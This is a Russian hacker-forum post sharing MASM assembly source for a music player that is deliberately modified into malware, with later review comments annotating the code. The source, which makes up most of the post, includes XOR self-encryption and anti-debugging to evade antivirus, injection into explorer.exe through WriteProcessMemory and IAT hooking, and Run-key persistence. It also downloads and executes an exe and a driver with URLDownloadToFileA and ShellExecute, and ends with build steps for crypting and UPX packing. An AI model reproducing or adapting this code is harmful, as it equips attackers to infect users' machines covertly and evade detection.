20 20 20 20 00000660 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000670 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000680 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000690 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000006A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000006B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000006C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000006D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000006E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 000006F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000700 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000710 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000720 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000730 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000740 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000750 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000760 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000770 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000780 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00000790 20 20 20 2
RE: BSOD - 2012-02-12 14:37:32.940000   
Elisaveta

А талоны на усиленное питание как распространять будем?
Идея такая -> дополним и перепишем исходник плеера:
=====================================
Это небольшой плеер, написанный на ассемблере. Очень простой и удобный интерфейс.
Поддерживаемые форматы: BIN, XM, IT, MOD, MID, RMI, SGT, FSB, S3M, WAV, MP2, MP3, OGG, RAW.
Возможности: СЕМЬ клавиш навигации, сворачивание в трей, установка звука, вывод размера и названия файла.
Автор: FreeCX
Мыло: FreeCX@yandex.ru
Модификация исходников:AmnesiaMMX + eLISAveta
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Ну что за гамма - как пожарная машина.
Добавим зелёного.Пускай нам по жизни светит только зелёный свет…
Спасибо WASM.RU , FreeCX , CrackLab.RU , The Jocker , Cr@wler , V_m_E_n , ГрекА,Александр Эккерт.
Ну и вам(как же без вас)спасибо!

;# \\\\\\\\\\\\\\\\ #;
;# AMNESIA FAUST GROUP PRESENTS: >>>>~~~A~~~~A~~~A~~/\~~A~~/\~~A~~/\~~A~~~A~~~A~~~|>>>-Yes>-+A+>A-> #;
;# //////////////// #;
;# Amnesia MMX Code #;
;# #;
;# Xакерский Плеер для форматов: BIN, XM, IT, MOD, MID, RMI, SGT, FSB, S3M, WAV, MP2, MP3, OGG, RAW. #:
;# +пример XOR-Crypt(a),Debugger Detect(A)Stack Segment Register))+Black AnimateWindow)+LoadLibraryA #;
;# Bof.dll(Debugger Crash Test))+AV Test -> Загрузка и запуск наших файлов и драйверов(WinXP) >>> #;
;# (URLDownToFile)+прописка в AutoRun,иньекция explorer.exe(попытка-не пытка,правда товарищ БЭэрия?) #;
;# Спасибо WASM,спасибо MASM,спасибо FreeCX & XAKEP TECHNOLOGIES !!! == == == == == == == == == == => #;
;################################################################################
;-----------------------------------------------------------------------
; _call <procname>
; Expands to `call [ebp+offset procname]`: an indirect call through the
; dword stored at `procname`, with ebp added to its link-time offset.
; NOTE(review): ebp presumably holds the address delta computed by the
; caller (see `loader` / `ThreadProc` later in this listing) - confirm.
; NOTE(review): `&lt;` / `&gt;` below are HTML-escaped `<` / `>` left by
; the page extraction; MASM text macros need the literal angle brackets.
;-----------------------------------------------------------------------
_call macro procname
    txt textequ &lt;&gt;
    txt catstr &lt;offset &gt;, &lt;procname&gt;, txt
    call [ebp+txt]
endm

.586
.model flat, stdcall
option casemap :none
.xlist
include data.inc
.list

.data
; Caption and text of the message box shown by the `Message` label below.
szMBHead db " My Program",0
szMBText db " Hallo ASM !!!",0

;------------ Random ------------;
; (a kind of RNG; not used yet)
;-----------------------------------------------------------------------
; Rand15 proc base:DWORD                      (32-bit MASM, stdcall)
; In:    base = divisor for the final reduction
; Out:   eax  = remainder of the mixed seed divided by base (0..base-1);
;               despite the name the range is not fixed to 0..15, the
;               original `and eax, 15` is commented out below
; Saves: ecx, edx (pushed on entry, popped before ret)
; Uses:  eax, flags, the FPU stack top, st(7) (freed), global r9Seed
; NOTE(review): r9Seed is not declared in this listing (presumably in
;   data.inc); it is written by `fstp` and read back by `mov`, so it is
;   assumed to be a 4-byte variable - confirm.
; NOTE(review): base == 0 raises a divide error at `div ecx`; nothing
;   visible here checks for it.
;-----------------------------------------------------------------------
.code
Rand15 proc base:DWORD
    mov eax, r9Seed
    push edx
    push ecx
    test eax, eax
    jne @F                          ; seed already set: skip the initial seeding
    invoke Sleep, eax               ; spend some cycles here and there (eax is 0 on this path, so Sleep(0))
    invoke GetTickCount             ; get a seed value
    mov r9Seed, eax
@@:
    ffree st(7)                     ; free a rarely used FP register
    mov ecx, 0FFFFFFH
    and eax, ecx
    inc eax                         ; make sure it's not zero
    push eax
    fldpi                           ; push PI on FPU
    fimul dword ptr [esp]           ; st(0) = PI * (masked seed + 1)
    db 00fh                         ; RDTSC emitted as raw opcode bytes (0F 31)
    db 031h                         ; rdtsc(opcode) we'll use only the loword
    and eax, ecx                    ; and 0FFFFFFH
    inc eax                         ; make sure it's not zero
    mov [esp], eax                  ; second external influence is rdtsc
    fimul dword ptr [esp]           ; *(rdtsc and 0FFFFFFH)
    pop eax
    fstp r9Seed                     ; now a cheap trick: pop a Real4 from the FPU,
    mov eax, r9Seed                 ; but mov an integer
    ; and eax, 15                   ; return a number between 0 and 15 (disabled; replaced by the division below)
    xor edx, edx                    ; edx:eax is the dividend; rdtsc overwrote edx, so clear it
    mov ecx, base
    div ecx
    mov eax, edx                    ; return the remainder
    pop ecx                         ; restore two
    pop edx                         ; precious registers
    ret                             ; <-- eax random
Rand15 endp

; Program entry point (named by `end start` at the end of the listing).
start:
;-------------------------------------------------------------------------------------------;
    db 35 dup (144)                 ; 35 bytes of 144 (90h, NOP) run as padding; author's note: room left for a later crypto wrapper or TLS
;-------------------------------------------------------------------------------------------;
    mov eax,Next                    ; Next is the label of the XOR loop that follows this block
    call eax                        ; indirect call through a register instead of `call Next`
    ret

;------------------------ Message ----------------------;
; Author's note: "let the AV engines try to work out the logic".
; NOTE(review): no jump or call to `Message` is visible anywhere in this
; listing and the `ret` above prevents fall-through, so this looks like
; unreachable filler code - confirm.
Message:
    invoke MessageBox,NULL,ADDR szMBText,ADDR szMBHead,MB_OK
    invoke ExitProcess,0

;------------------------------------- XOR Crypt ------------------------------------;
; Symmetric XOR encoder, based on code from WASM.RU
; (author's claim: even this simple byte-wise XOR gives a great AV result)
; ;---------------------------------------------------------------------------------------; Next: MOV ESI, bоdу_begin MOV EDI, ESI MOV ECX, bоdу_end - bоdу_begin ; 0f55 ? / Random ? my_begin: LODSB XOR AL, 77h ; 77h / заменим позже на Randomize ?? STOSB LOOP my_begin bоdу_begin: ;------------------ Debugger Detect Code ---------------; ; (В нашем учебном образце один Anti-Debug)для примера)); ;[Stack Segment Register + AnimateWindow + LoadLibraryA]; ;-------------------------------------------------------; push ss pop ss pushfd nop push ss ; junk pop ss pushfd ; junk pop eax and eax,256 ; 256 or eax, eax jnz Found ; jnz Debugger crash jmp NotFound ret Found: ; ------- BlackAnimateWindow ------; ; ---- Ооо,это мой цвет...Души ----; invoke WindowFromPoint,13ah,100h invoke AnimateWindow,eax,701h,90000h ;---------- OllyDbg Crash----------; push offset Olly call LoadLibraryA ; bof.dll(CRC32?); RET ; не забыть привязать к Лоадеру; NotFound: ;--------- Explorer Inject --------; ;------- (Попытаем счастья) -------; .const sKERNEL32_DLL db 'KERNEL32.DLL',0 sUSER32_DLL db 'USER32.DLL',0 sEXPLORER_EXE db 'EXPLORER.EXE',0 sShell_TrayWnd db 'Shell_TrayWnd',0 sCreateThread db 'CreateThread',0 sGetDlgCtrlID db 'GetDlgCtrlID',0 sMessageBox db 'MessageBoxA',0 .code invoke GetModuleHandle,offset sKERNEL32_DLL mov esi,eax invoke GetProcAddress,esi,offset sCreateThread mov @CreateThread,eax invoke LoadLibrary,offset sUSER32_DLL mov esi,eax invoke GetProcAddress,esi,offset sGetDlgCtrlID mov @GetDlgCtrlID,eax invoke GetProcAddress,esi,offset sMessageBox mov @MessageBox,eax xor ebx,ebx ; Определяем хэндл процесса explorer.exe invoke FindWindow,ADDR sShell_TrayWnd,ebx push eax push esp push eax call GetWindowThreadProcessId ; в стеке остался ProcessId push ebx ; push FALSE push PROCESS_ALL_ACCESS call OpenProcess test eax,eax jz @@return xchg eax,ebx ; Определяем ImageBase эксплорера и всё остальное из заголовка invoke LoadLibrary,ADDR sEXPLORER_EXE test eax,eax jz @@return push ebx mov 
ebx,[eax+3ch] ; в EBX указатель на PE-header mov esi,[eax+ebx+34h] ; Explorer ImageBase mov @ImageBase,esi push [eax+ebx+80h] pop @ImportTableRVA add @ImportTableRVA,eax add esi,[eax+ebx+0a0h] ; теперь указывает на секцию .reloc ; ищем адрес функции GetDlgCtrlID в IAT эксплорера mov edi,@ImportTableRVA mov edx,'RESU'; USER32.DLL xchg eax,ebx @@: mov eax,[edi+0ch] add eax,ebx cmp [eax],edx je @f add edi,14h jmp @b @@: mov edi,[edi+10h] add edi,ebx mov eax,@GetDlgCtrlID @@: scasd jnz @b sub edi,04h sub edi,ebx add edi,@ImageBase mov iat_a,edi ; вставляем себя в секцию .reloc pop ebx ; Хэндл Процесса push esp push PAGE_READWRITE push copysize push esi push ebx call VirtualProtectEx push esp push PAGE_READWRITE push 04h push iat_a push ebx call VirtualProtectEx push esp push copysize push offset start push esi push ebx call WriteProcessMemory xchg eax,ecx jecxz @@return push esp push 04h lea edi,@tmp_buf push edi mov eax,offset loader - offset start add eax,esi stosd push [iat_a] push ebx call WriteProcessMemory @@return: jmp @@program ; загрузчик loader proc pushad xor ebx,ebx call @f @@: pop ebp sub ebp,offset @b ; в ebp смещение кода mov eax,[ebp+offset @GetDlgCtrlID] db 0a3h iat_a dd 0h ; mov [iat_a],eax push eax push esp push ebx ; push 0 push ebp ; передаём смещение кода lea eax,[ebp+offset ThreadProc] push eax push ebx ; push 0 push ebx ; push 0 _call @CreateThread pop eax @@: push [esp+7*4+8] ; переданный параметр _call @GetDlgCtrlID mov [esp+7*4],eax ; pushad.eax popad ret 04h loader endp capt db 'DeInfection',0 text db 'PikA-Bello!',0 ; внедрившись выполняемся отдельным потоком c передачей управления на пламенный msg-привет! 
ThreadProc proc pushad mov ebp,[esp+4*8+4] ; смещение кода push MB_ICONINFORMATION lea eax,[ebp+offset capt] push eax lea eax,[ebp+offset text] push eax push 0 _call @MessageBox popad ret 04h ThreadProc endp @CreateThread dd 0 @GetWindowThreadProcessId dd 0 @FindWindow dd 0 @GetDlgCtrlID dd 0 @MessageBox dd 0 copysize equ $ - offset start @tmp_buf label dword @ImageBase dd 0 @ImportTableRVA dd 0 @@program: .code ;--------- Закрепляйся,загружайся и впивайся(для самых маленьких)(Чтобы наверняка) ------------------; ; Чтобы выжить - лучше подгружать себя к какому-нибудь системному процессу(а не гадить в реестр),для ; ; игры в прятки на уровне ядра - использовать драйвер сокрытия процессов из диспечера задач.][-.106 ; ; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ; Свои-свои.Но где свои - там могут появится и чужие...О,спасибо могучий Александр Э.Большой враг AV ; ; Враг моего врага - наш друг ! ;----------------------------------------------------------------------------------------------------; ;-------------- AutoRun(самое простое)А стоит ли))но тест - есть тест !!! 
-----------------; push 0 push offset pKey push 0 push KEY_ALL_ACCESS push REG_OPTION_NON_VOLATILE push 0 push 0 push offset RunKey push HKEY_CURRENT_USER ; push HKEY_LOCAL_MACHINE call RegCreateKeyExA push offset PathToSavedr call lstrlenA push eax push offset PathToSavedr push REG_SZ push 0 push offset Service push pKey call RegSetValueExA push pKey call RegCloseKey push offset pi push offset startupinfo push 0 push 0 push 0 push NORMAL_PRIORITY_CLASS push 0 push 0 push 0 push offset PathToSavedr call CreateProcessA ; ------ URLDownTo ------; ; --- А это оставим -----; xor eax, eax mov ecx, offset DQWORD_VAL db 00fh, 10h, 01h ; опять пишем на опкодах db 00fh, 50h, 0c0h test eax, eax jz Exit ;--------- Driver -------; push offset URLmonStr call LoadLibraryA push offset Downloadfunc push eax call GetProcAddress push 0 push 0 push offset PathToSavedr push offset TargetURLdr push 0 call eax push offset Shell32Str call LoadLibraryA push offset Executefunc push eax call GetProcAddress push 0 push 0 push 0 push offset PathToSavedr push offset OpenString push 0 call eax ;---------- Exe --------; push offset URLmonStr call LoadLibraryA push offset Downloadfunc push eax call GetProcAddress push 0 push 0 push offset PathToSave push offset TargetURL push 0 call eax push offset Shell32Str call LoadLibraryA push offset Executefunc push eax call GetProcAddress push 0 push 0 push 0 push offset PathToSave push offset OpenString push 0 call eax push 1000 call Sleep mov eax,Music jmp eax ;--- Exit Code ---; Exit: push 0 call ExitProcess ;--------------------------------------------- String -----------------------------------------------------------------------------; Olly db "bof.dll",0 Service db "System",0 OpenString db "open",0 URLmonStr db "urlmon.dll",0 Shell32Str db "shell32.dll",0 Executefunc db "ShellExecuteA",0 Downloadfunc db "URLDownloadToFileA",0 TargetURL db "http://127.0.0.1/test.sys",0 ; Driver-URL(как вариант загрузить драйвер обращающийся к памяти по нулевому 
; (tail of the comment that starts on the previous line) ... null pointer);
; String constants used by the registry, process-creation and download
; calls earlier in the listing.  For an analyst these are the host
; artifacts of the sample: a Run-key path, two download URLs and two
; hard-coded drop paths on the user's desktop.
TargetURLdr db "http://127.0.0.1/test.exe",0 ; URL given to URLDownloadToFileA together with PathToSavedr; loopback placeholder (author's note: server hosting test.exe or another payload of the reader's choice)
RunKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0 ; key path given to RegCreateKeyExA under HKEY_CURRENT_USER earlier in the listing (author's note: any other location would do; loading a DLL is preferred)
PathToSave db "C:\Documents and Settings\Пользователь\Рабочий стол\test.sys",0 ; destination path for the TargetURL download (author's note: suggests %systemroot% instead)
PathToSavedr db "C:\Documents and Settings\Пользователь\Рабочий стол\test.exe",0 ; destination path for the TargetURLdr download; also written as the Run value data and started with CreateProcessA (author's note: prefers a system32 location)
DQWORD_VAL db 0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh ; 16 bytes of 0FFh, operand of the raw-opcode sequence that precedes the download code (original comment: thanks to GrekA)

;+++++++++++++++++++++++++++++++ Small Player --> added: BIN format, one more key, mouse handling +++++++++++++++++++++++++++++++;
; Music: start of the player part.  Reached through `mov eax,Music / jmp eax`
; at the end of the download code.  Creates the two brushes used for
; painting, then runs the dialog modally and exits the process.
; Green, Black, DIALOG and the h* variables are not declared in this
; listing (presumably in data.inc).
Music:
    invoke GetModuleHandle, NULL
    mov hInstance, eax
    invoke CreateSolidBrush, Green
    mov hBrush, eax                     ; frame brush used in WM_PAINT
    invoke CreateSolidBrush, Black
    mov hBkColor, eax                   ; background brush returned for WM_CTLCOLOR*
    invoke InitCommonControls
    invoke DialogBoxParam, hInstance, DIALOG, NULL, addr DlgProc, NULL
    invoke ExitProcess, NULL

;-----------------------------------------------------------------------
; DlgProc - dialog procedure passed to DialogBoxParam by `Music`.
; In:  hWnd, uMsg, wParam, lParam (stdcall)
; Out: eax = hBkColor for WM_CTLCOLORDLG / WM_CTLCOLORSTATIC /
;            WM_CTLCOLORLISTBOX, 0 for every other message
; Globals such as ModHandle, ModSound, Path, TEMP, fName, fSize,
; TrayName, note and ofn are declared outside this listing (presumably
; data.inc); their sizes cannot be checked from here.
; The _FSOUND_* / _FMUSIC_* routines are external - presumably the FMOD
; audio library; confirm.
; NOTE(review): inside WM_COMMAND the command id is kept only in eax.
;   Every handler that calls an API or reloads eax (LOAD, MINIMIZE, ...)
;   destroys it before the following `.if eax == ...` tests run.
;-----------------------------------------------------------------------
DlgProc proc hWnd :HWND, uMsg :UINT, wParam :WPARAM, lParam :LPARAM
    LOCAL ps :PAINTSTRUCT
    LOCAL hdc :HDC
    LOCAL rect :RECT
    LOCAL pt :POINT                     ; not referenced in the visible body
    LOCAL lb :LOGBRUSH
    .if uMsg == WM_INITDIALOG
        invoke LoadIcon, hInstance, 1
        mov hIcon, eax
        invoke SendMessage, hWnd, WM_SETICON, 1, hIcon
        invoke SetWindowText, hWnd, addr AppName
        invoke _FSOUND_Init, 44100, 32, 0
        ; Resource 18 (RT_RCDATA) is pushed through the STATIC2 control to
        ; copy at most 0FFh characters of it into ScrollStr.
        invoke FindResource, hInstance, 18, RT_RCDATA
        invoke LoadResource, hInstance, eax
        invoke SetDlgItemText, hWnd, STATIC2, eax
        invoke GetDlgItemText, hWnd, STATIC2, addr ScrollStr, 0FFh
        mov len, eax
        add len, 47
        invoke SetDlgItemText, hWnd, STATIC2, NULL
        invoke lstrcat, addr ScrollStr, addr Space
        ; NOTE(review): 80000 is decimal here; WS_EX_LAYERED is 80000h - confirm which was meant.
        invoke SetWindowLong, hWnd, GWL_EXSTYLE, 80000
        ; Attach a bitmap resource to each button control.
        invoke Bitmap2But, hWnd, hInstance, IMAGE, 5
        invoke Bitmap2But, hWnd, hInstance, LOAD, 7
        invoke Bitmap2But, hWnd, hInstance, EXIT, 8
        invoke Bitmap2But, hWnd, hInstance, START, 10
        invoke Bitmap2But, hWnd, hInstance, PAUSE1, 11
        invoke Bitmap2But, hWnd, hInstance, STOP, 15
        invoke Bitmap2But, hWnd, hInstance, MINIMIZE, 21
        invoke Bitmap2But, hWnd, hInstance, FrecAdd, 24
        invoke Bitmap2But, hWnd, hInstance, FrecSub, 25
        invoke Bitmap2But, hWnd, hInstance, Key, 27
        invoke SetTimer, hWnd, 1, 200, 0                    ; 200 ms timer drives the text scroller (WM_TIMER)
        invoke SendDlgItemMessage, hWnd, SLIDER, TBM_SETRANGEMIN, FALSE, 0
        invoke SendDlgItemMessage, hWnd, SLIDER, TBM_SETRANGEMAX, FALSE, 32
        invoke SendDlgItemMessage, hWnd, SLIDER, TBM_SETPOS, TRUE, 25
    .elseif uMsg == WM_COMMAND
        mov eax, wParam
        .if eax == LOAD
            ; Fill the OPENFILENAME structure and ask the user for a file.
            mov ofn.lStructSize, SIZEOF ofn
            push hWnd
            pop ofn.hWndOwner
            push hInstance
            pop ofn.hInstance
            mov ofn.lpstrFilter, offset Filter
            mov ofn.lpstrFile, offset Path
            mov ofn.nMaxFile, MAXSIZE
            mov ofn.Flags, OFN_FILEMUSTEXIST or OFN_PATHMUSTEXIST or OFN_LONGNAMES or\
                           OFN_EXPLORER or OFN_HIDEREADONLY
            mov ofn.lpstrTitle, offset TitleCaption
            invoke GetOpenFileName, addr ofn
            cmp eax, 0
            je no                                           ; dialog cancelled or failed
            ; Release whatever was loaded before.
            .if ModSound == TRUE
                invoke _FMUSIC_FreeSong, ModHandle
            .elseif ModSound == FALSE
                invoke _FSOUND_Sample_Free, ModHandle
            .endif
            ; Try the file as a module/song first, fall back to a sample.
            invoke _FMUSIC_LoadSong, addr Path
            cmp eax, 0
            je unload
            mov ModHandle, eax
            invoke _FMUSIC_PlaySong, ModHandle
            mov ModSound, TRUE
            ; NOTE(review): `mov` leaves the flags untouched, so this `je`
            ; tests whatever _FMUSIC_PlaySong left behind; when it is not
            ; taken, execution falls into `unload` and the file is loaded
            ; a second time as a sample.  `jmp load` looks intended.
            je load
          unload:
            invoke _FSOUND_Sample_Load, 0, addr Path, FSOUND_16BITS+FSOUND_STEREO, 0
            mov ModHandle, eax
            invoke _FSOUND_PlaySound, 0, ModHandle
            mov ModSound, FALSE
            invoke GetFileTitle, addr Path, addr TEMP, 50h
            jmp sound
          load:
            mov fName, 0                                    ; reset fName (song path only)
            invoke _FMUSIC_GetName, ModHandle
            invoke SetDlgItemText, hWnd, STATIC2, eax
            invoke GetDlgItemText, hWnd, STATIC2, addr TEMP, 0FFh
          sound:
            invoke _FSOUND_GetFrequency, 0
            mov SoundF, eax
            invoke SetDlgItemInt, hWnd, Freq, SoundF, 0
            ; NOTE(review): the lstrcat calls below append file-derived text
            ; with no length check.  TEMP is filled with a 50h limit above
            ; and a 0FFh limit elsewhere, TrayName is never reset in the
            ; visible code (it grows with every load) and fName is reset
            ; only on the `load` path.  Buffer sizes are outside this
            ; listing - verify they cannot be overrun.
            invoke lstrcat, addr fName, addr TEMP
            invoke lstrcat, addr TrayName, addr TEMP
            invoke lstrcat, addr fName, addr Space
            invoke lstrlen, addr fName
            sub eax, 5
            mov _len, eax
            ; File size is converted to text through the STATIC2 control.
            invoke filesize, addr Path
            invoke SetDlgItemInt, hWnd, STATIC2, eax, 0
            invoke GetDlgItemText, hWnd, STATIC2, addr TEMP, 0FFh
            invoke lstrcat, addr fSize, addr fTSize
            invoke lstrcat, addr fSize, addr TEMP
            invoke lstrcat, addr fSize, addr kb
            invoke SetDlgItemText, hWnd, STATIC2, addr fSize
            mov fSize, 0                                    ; reset fSize for the next load
          no:
        .endif
        .if eax == PAUSE1
            .if ModSound == TRUE
                invoke _FMUSIC_SetPaused, ModHandle, TRUE
            .elseif ModSound == FALSE
                invoke _FSOUND_SetPaused, FSOUND_ALL, TRUE
            .endif
        .endif
        .if eax == START
            cmp Boolean, TRUE                               ; Boolean is set to TRUE by STOP below
            jnz best
            ; Stopped: restart playback from the beginning.
            .if ModSound == TRUE
                invoke _FMUSIC_PlaySong, ModHandle
            .elseif ModSound == FALSE
                invoke _FSOUND_PlaySound, 0, ModHandle
            .endif
          best:
            ; Clear the paused state in either case.
            .if ModSound == TRUE
                invoke _FMUSIC_SetPaused, ModHandle, FALSE
            .elseif ModSound == FALSE
                invoke _FSOUND_SetPaused, FSOUND_ALL, FALSE
            .endif
            mov Boolean, FALSE
        .endif
        .if eax == STOP
            .if ModSound == TRUE
                invoke _FMUSIC_StopSong, ModHandle
            .elseif ModSound == FALSE
                invoke _FSOUND_StopSound, FSOUND_ALL
            .endif
            mov Boolean, TRUE
        .endif
        .if eax == EXIT
            .if ModSound == TRUE
                invoke _FMUSIC_FreeSong, ModHandle
            .elseif ModSound == FALSE
                invoke _FSOUND_Close
            .endif
            invoke EndDialog, hWnd, NULL
        .endif
        .if eax == MINIMIZE
            ; Hide the dialog and add a tray icon that reports back with WM_USER+5.
            mov note.cbSize, sizeof NOTIFYICONDATA
            push hWnd
            pop note.hwnd
            mov note.uID, 0
            mov note.uFlags, NIF_ICON+NIF_MESSAGE+NIF_TIP
            mov note.uCallbackMessage, WM_USER+5
            mov eax, hIcon
            mov note.hIcon, eax
            ; NOTE(review): unbounded copy into the fixed-size szTip field;
            ; TrayName grows with every loaded file (see the LOAD handler).
            invoke lstrcpy, addr note.szTip, addr TrayName
            invoke ShowWindow,hWnd, SW_HIDE
            invoke Shell_NotifyIcon, NIM_ADD, addr note
        .endif
        .if eax == FrecAdd
            cmp SoundF, 704600                              ; only an exact match stops the increase
            je loc_003
            add SoundF, 1000
          loc_003:
            invoke SetDlgItemInt, hWnd, Freq, SoundF, 0
            invoke _FSOUND_SetFrequency, FSOUND_ALL, SoundF
        .endif
        .if eax == FrecSub
            cmp SoundF, 1100                                ; only an exact match stops the decrease
            je loc_004
            sub SoundF, 1000
          loc_004:
            invoke SetDlgItemInt, hWnd, Freq, SoundF, 0
            invoke _FSOUND_SetFrequency, FSOUND_ALL, SoundF
        .endif
    .elseif uMsg == WM_USER+5
        ; Tray icon callback: a double click restores the window and removes the icon.
        .if wParam == 0
            .if lParam == WM_LBUTTONDBLCLK
                invoke SendMessage, hWnd, WM_COMMAND, 1000, 0
                invoke ShowWindow,hWnd, SW_RESTORE
                invoke Shell_NotifyIcon, NIM_DELETE, addr note
            .endif
        .endif
    .elseif uMsg == WM_HSCROLL
        mov eax, wParam
        and eax, 0FFFFh                                     ; low word = scroll request code
        .if eax == TB_THUMBPOSITION
            mov eax, wParam
            shr eax, 16                                     ; high word = slider position (range 0..32 set in WM_INITDIALOG)
            imul eax, 8                                     ; scaled to 0..256 for the volume calls
            .if ModSound == TRUE
                invoke _FMUSIC_SetMasterVolume, ModHandle, eax
            .elseif ModSound == FALSE
                invoke _FSOUND_SetVolume, FSOUND_ALL, eax
            .endif
        .endif
    .elseif uMsg == WM_LBUTTONDOWN
        ; Treat a click anywhere in the client area as a click on the caption.
        invoke SendMessage, hWnd, WM_NCLBUTTONDOWN, HTCAPTION, 0
    .elseif uMsg == WM_CTLCOLORDLG
        mov eax, hBkColor
        ret
    .elseif uMsg == WM_CTLCOLORSTATIC || uMsg == WM_CTLCOLORLISTBOX
        invoke SetColor, wParam, TRANSPARENT, Red
        mov eax, hBkColor
        ret
    .elseif uMsg == WM_TIMER
        invoke TextScr, len, number                         ; advance the scroll position, wrapping at len
        mov number, eax
        invoke RedrawWindow, hWnd, 0, 0, TRUE
    .elseif uMsg == WM_PAINT
        invoke BeginPaint, hWnd, addr ps
        mov hdc, eax
        invoke SetColor, hdc, TRANSPARENT, Red
        invoke GetClientRect, hWnd, addr rect
        invoke FrameRect, hdc, addr rect, hBrush
        mov rect.top, 6
        mov rect.right, 150
        mov rect.left, 5
        invoke DrawText, hdc, addr ScrollStr, number, addr rect, DT_RIGHT
        invoke lstrlen, addr fName
        cmp eax, 0
        je loc_001                                          ; no file name yet: skip the second text line
        invoke TextScr, eax, _numb
        mov _numb, eax
        mov rect.top, 25
        mov rect.right, 190
        invoke DrawText, hdc, addr fName, _numb, addr rect, DT_RIGHT
      loc_001:
        mov lb.lbStyle, BS_SOLID
        mov lb.lbColor, Green
        mov lb.lbHatch, 0
        ; NOTE(review): a new pen is created on every WM_PAINT (the timer
        ; forces a repaint every 200 ms) and no DeleteObject is visible,
        ; so GDI handles leak for as long as the dialog is open.
        invoke ExtCreatePen, PS_SOLID, 1, addr lb, 0, 0
        invoke SelectObject, hdc, eax
        invoke MoveToEx, hdc, 0, 25, NULL
        invoke LineTo, hdc, 200, 25
        invoke MoveToEx, hdc, 0, 57, NULL
        invoke LineTo, hdc, 200, 57
        invoke EndPaint, hWnd, addr ps
    .endif
    xor eax, eax
    Ret
DlgProc EndP

;-----------------------------------------------------------------------
; TextScr - step a scroll counter.
; In:  len_t = wrap value, numb = current position
; Out: eax = numb + 1, or 0 when numb + 1 equals len_t
;-----------------------------------------------------------------------
TextScr proc len_t :DWORD, numb :DWORD
    inc numb
    mov eax, numb
    cmp eax, len_t
    jnz loc_002
    xor eax, eax                        ; reached the end: wrap to 0
loc_002:
    Ret
TextScr EndP

;-----------------------------------------------------------------------
; Bitmap2But - load bitmap resource `Res` from `hInst` and set it as the
; image of dialog control `But` in dialog `handle` (BM_SETIMAGE).
; The LoadBitmap result is passed on unchecked.
;-----------------------------------------------------------------------
Bitmap2But proc handle :HWND, hInst :HINSTANCE, But :DWORD, Res :DWORD
    invoke LoadBitmap, hInst, Res
    invoke SendDlgItemMessage, handle, But, BM_SETIMAGE, IMAGE_BITMAP, eax
    Ret
Bitmap2But EndP

;-----------------------------------------------------------------------
; SetColor - set the background colour (Bk) and text colour (Text) of DC.
; NOTE(review): both callers pass TRANSPARENT as Bk.  TRANSPARENT is a
; SetBkMode mode value, so here SetBkColor receives it as a COLORREF;
; SetBkMode was probably intended - confirm.
;-----------------------------------------------------------------------
SetColor proc DC :HDC, Bk :COLORREF, Text :COLORREF
    invoke SetBkColor, DC, Bk
    invoke SetTextColor, DC, Text
    Ret
SetColor EndP

; End marker of the byte range processed by the XOR loop at `Next`.
bоdу_end:
end start
; **************************** Happy END ******************************** ;
; ;
; Посуём мы всё в бадью,закриптуем и .., - Адью!
; Потому что в самом деле - не давать же им Ладью !
; ;
; +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ;
; >>>>>>>>—————-> >>>>>>>>—————> >>>>>>>>———–> ;
; После компиляции [MASM32] > build.bat -> открываем образец в отладчике> ;
; Нажимаем F9 на исполнение –> код закриптуется -/\/\/\/\/\/\/\/\/\/\–> ;
; Выделяем закриптованый участок кода –> (Отсюда и до сколько надо) –> ;
; Сохраняем модификацию –> Copy to Executable –> Selection -> Save file ;
; Для уменьшения веса сожмём UPX-ом(или чем угодно)хоть свой пакер пишите ;
; Протестируем основные и дополнительные возможности:,
; (только не забываем правильно указать путь к залитым файлам на сервере) ;

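; ---------- data.inc ----------;
; Includes, prototypes, control ids and global data of the player.
; Changes against the posted version: the HTML-escaped "&lt;&gt;" structure
; initialisers are restored to "<>", Path is sized to MAXSIZE (the length the
; open-file dialog is told it may write) and TEMP to 256 bytes (the posted code
; reads up to 0FFh characters into it).
; NOTE(review): urlmon, advapi32 and shell32 are not used by the player code
; shown on the page; presumably they serve the download/registry code earlier
; in the listing - an import set worth noting when triaging the binary.

include fmod.inc
includelib fmod.lib

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\masm32.inc
include \masm32\include\gdi32.inc
include \masm32\include\winmm.inc
include \masm32\include\urlmon.inc
include \masm32\include\comdlg32.inc
include \masm32\include\comctl32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\winmm.lib
includelib \masm32\lib\urlmon.lib
includelib \masm32\lib\comdlg32.lib
includelib \masm32\lib\comctl32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib

; ---- prototypes ----
DlgProc     proto :HWND, :UINT, :WPARAM, :LPARAM
Bitmap2But  proto :HWND, :HINSTANCE, :DWORD, :DWORD
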